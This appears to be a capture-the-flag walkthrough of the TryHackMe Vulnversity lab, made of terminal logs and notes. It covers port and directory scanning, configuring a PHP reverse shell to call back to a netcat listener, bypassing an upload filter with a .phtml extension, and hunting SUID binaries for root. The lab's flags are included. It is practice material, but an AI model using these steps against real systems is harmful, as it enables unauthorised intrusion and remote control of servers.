┌──(anonymous㉿Unknown)-[~]
└─$ sudo openvpn /home/anonymous/Works/TryHackMe/AbdulRahimK.ovpn
2022-04-17 00:33:27 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2022-04-17 00:33:27 DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.
2022-04-17 00:33:27 OpenVPN 2.5.6 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Mar 20 2022
2022-04-17 00:33:27 library versions: OpenSSL 1.1.1n  15 Mar 2022, LZO 2.10
2022-04-17 00:33:27 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:27 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:27 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.129.195:1194
2022-04-17 00:33:27 Socket Buffers: R=[212992->212992] S=[212992->212992]
2022-04-17 00:33:27 UDP link local: (not bound)
2022-04-17 00:33:27 UDP link remote: [AF_INET]18.202.129.195:1194
2022-04-17 00:33:28 TLS: Initial packet from [AF_INET]18.202.129.195:1194, sid=be32cce0 0adbc7d0
2022-04-17 00:33:28 VERIFY OK: depth=1, CN=ChangeMe
2022-04-17 00:33:28 VERIFY KU OK
2022-04-17 00:33:28 Validating certificate extended key usage
2022-04-17 00:33:28 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2022-04-17 00:33:28 VERIFY EKU OK
2022-04-17 00:33:28 VERIFY OK: depth=0, CN=server
2022-04-17 00:33:28 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bit RSA, signature: RSA-SHA256
2022-04-17 00:33:28 [server] Peer Connection Initiated with [AF_INET]18.202.129.195:1194
2022-04-17 00:33:29 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2022-04-17 00:33:30 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route-metric 1000,comp-lzo no,route-gateway 10.8.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.8.73.220 255.255.0.0,peer-id 48'
2022-04-17 00:33:30 OPTIONS IMPORT: timers and/or timeouts modified
2022-04-17 00:33:30 OPTIONS IMPORT: compression parms modified
2022-04-17 00:33:30 OPTIONS IMPORT: --ifconfig/up options modified
2022-04-17 00:33:30 OPTIONS IMPORT: route options modified
2022-04-17 00:33:30 OPTIONS IMPORT: route-related options modified
2022-04-17 00:33:30 OPTIONS IMPORT: peer-id set
2022-04-17 00:33:30 OPTIONS IMPORT: adjusting link_mtu to 1625
2022-04-17 00:33:30 Using peer cipher 'AES-256-CBC'
2022-04-17 00:33:30 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-04-17 00:33:30 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:30 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-04-17 00:33:30 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-04-17 00:33:30 net_route_v4_best_gw query: dst 0.0.0.0
2022-04-17 00:33:30 net_route_v4_best_gw result: via 192.168.1.1 dev eth0
2022-04-17 00:33:30 ROUTE_GATEWAY 192.168.1.1/255.255.255.0 IFACE=eth0 HWADDR=00:50:56:21:88:bb
2022-04-17 00:33:30 TUN/TAP device tun0 opened
2022-04-17 00:33:30 net_iface_mtu_set: mtu 1500 for tun0
2022-04-17 00:33:30 net_iface_up: set tun0 up
2022-04-17 00:33:30 net_addr_v4_add: 10.8.73.220/16 dev tun0
2022-04-17 00:33:30 net_route_v4_add: 10.10.0.0/16 via 10.8.0.1 dev [NULL] table 0 metric 1000
2022-04-17 00:33:30 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-04-17 00:33:30 Initialization Sequence Completed

                                    
                                    
====================================================================================================================
                                                                                                                                                                                             
┌──(root㉿Unknown)-[/home/anonymous]
└─# nmap -sV 10.10.110.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 02:14 EDT
Nmap scan report for 10.10.110.116
Host is up (0.17s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.15 seconds

===================================================================================================================
┌──(root㉿Unknown)-[/home/anonymous]
└─# nmap -O 10.10.110.116 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 02:17 EDT
Nmap scan report for 10.10.110.116
Host is up (0.17s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3333/tcp open  dec-notes
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/17%OT=21%CT=1%CU=41085%PV=Y%DS=2%DC=I%G=Y%TM=625BB11
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
OS:1NW6%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds

===================================================================================================================
┌──(root㉿Unknown)-[/home/anonymous]
└─# nmap -A 10.10.110.116
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-17 02:19 EDT
Nmap scan report for 10.10.110.116
Host is up (0.17s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/17%OT=21%CT=1%CU=44318%PV=Y%DS=2%DC=T%G=Y%TM=625BB1B
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
OS:1NW6%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2022-04-17T02:20:33-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-04-17T06:20:32
|_  start_date: N/A
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   172.08 ms 10.8.0.1
2   172.34 ms 10.10.110.116

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.12 seconds

===================================================================================================================
┌──(root㉿Unknown)-[/home/anonymous]
└─# gobuster dir -u http://10.10.110.116:3333 -w /usr/share/wordlists/dirb/small.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.110.116:3333
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/04/17 02:25:24 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 319] [--> http://10.10.110.116:3333/css/]
/images               (Status: 301) [Size: 322] [--> http://10.10.110.116:3333/images/]
/internal             (Status: 301) [Size: 324] [--> http://10.10.110.116:3333/internal/]
/js                   (Status: 301) [Size: 318] [--> http://10.10.110.116:3333/js/]      
                                                                                         
===============================================================
2022/04/17 02:25:42 Finished
===============================================================

===================================================================================================================
Look on Web page source code: press CTL + U
<html>
<head>
<link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
<style>
html, body {
    height: 30%;
}
html {
    display: table;
    margin: auto;
}
body {
    display: table-cell;
    vertical-align: middle;
    text-align: center;
}
</style>
</head>
<body>
<form action="index.php" method="post" enctype="multipart/form-data">
    <h3>Upload</h3><br />
    <input type="file" name="file" id="file">
    <input class="btn btn-primary" type="submit" value="Submit" name="submit">
</form>
</body>
</html>

===================================================================================================================
Identified its using php file.
googled "php reverse shell"

                                                                     
┌──(anonymous㉿Unknown)-[~/Tools/Reverser]
└─$ git clone https://github.com/pentestmonkey/php-reverse-shell.git           
Cloning into 'php-reverse-shell'...
remote: Enumerating objects: 10, done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 10
Receiving objects: 100% (10/10), 9.81 KiB | 279.00 KiB/s, done.
Resolving deltas: 100% (2/2), done.


┌──(anonymous㉿Unknown)-[~/Tools/Reverser]
└─$ cd php-reverse-shell 
                                                                                                                                                                                             
┌──(anonymous㉿Unknown)-[~/Tools/Reverser/php-reverse-shell]
└─$ ls
CHANGELOG  COPYING.GPL  COPYING.PHP-REVERSE-SHELL  LICENSE  php-reverse-shell.php  README.md
                                                                                                                                                                                             
┌──(anonymous㉿Unknown)-[~/Tools/Reverser/php-reverse-shell]
└─$ sudo nano ./php-reverse-shell.php                            
[sudo] password for anonymous: 

UPDATE IT :

set_time_limit (0);
$0VERSION = "1.0";
$ip = '10.8.73.220';  // CHANGE THIS
$port = 8787;       // CHANGE THIS

[!!! I MAKE ONE MISTAKE HERE, PLEASE MAKE SURE $ip must given the Attacker IP address.!!!]
===================================================================================================================
Open new tab in terminal

┌──(anonymous㉿Unknown)-[~]
└─$ nc -lvnp 8787         
listening on [any] 8787 ...

Now try to upload that edited php file

ERROR: ! .php file not allowed to upload

check that on google, or with the help of Burpsuite

I found there is a possibility with .phtml extension

Rename .php file to phtml and try to upload once. be sure the above terminal is still running.

┌──(anonymous㉿Unknown)-[~/Tools/Reverser/php-reverse-shell]
└─$ ls
CHANGELOG  COPYING.GPL  COPYING.PHP-REVERSE-SHELL  LICENSE  php-reverse-shell.php  README.md
                                                                                                                                                                                             
┌──(anonymous㉿Unknown)-[~/Tools/Reverser/php-reverse-shell]
└─$ mv php-reverse-shell.php php-reverse-shell.phtml
                                                                                                                                                                                             
┌──(anonymous㉿Unknown)-[~/Tools/Reverser/php-reverse-shell]
└─$ ls
CHANGELOG  COPYING.GPL  COPYING.PHP-REVERSE-SHELL  LICENSE  php-reverse-shell.phtml  README.md

===================================================================================================================
Once successfully upload the .phtml file, access that file via browser.




What is the name of the user who manages the webserver?

command using: pwd

bill


What is the user flag?

command using: cat

cat user.txt

8bd7992fbe8a6ad22a63361004cfcedb

===================================================================================================================

On the system, search for all SUID files. What file stands out?
using find command:
	find / -user root -perm -4000 -exec ls -ldb {} \;
	
I will list out some directories and files
there is a website called GTFOBins: https://gtfobins.github.io/
to search out the listed binaries and check which one support SUID

Ans: /bin/systemctl



Once get root

cat /root/root.txt

a58ff8579f0a9270368d33a9966c7fd5






